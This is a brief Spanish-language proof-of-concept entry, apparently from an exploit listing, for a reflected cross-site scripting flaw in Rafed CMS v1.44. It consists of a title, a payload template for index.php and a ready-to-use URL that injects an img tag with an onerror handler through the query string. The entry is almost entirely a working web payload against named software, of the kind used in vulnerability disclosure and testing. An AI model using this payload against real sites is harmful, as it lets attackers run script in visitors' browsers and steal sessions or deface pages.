
Exploit de prueba de concepto para una vulnerabilidad de Cross-Site Scripting (XSS) reflejado en Rafed CMS v1.44 a través del parámetro index.php, permitiendo la ejecución arbitraria de JavaScript.
Rafed CMS Website v1.44 - Cross Site Scripting (XSS)
index.php?">{XSS_Payload] in index.php
https://localhost/?%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E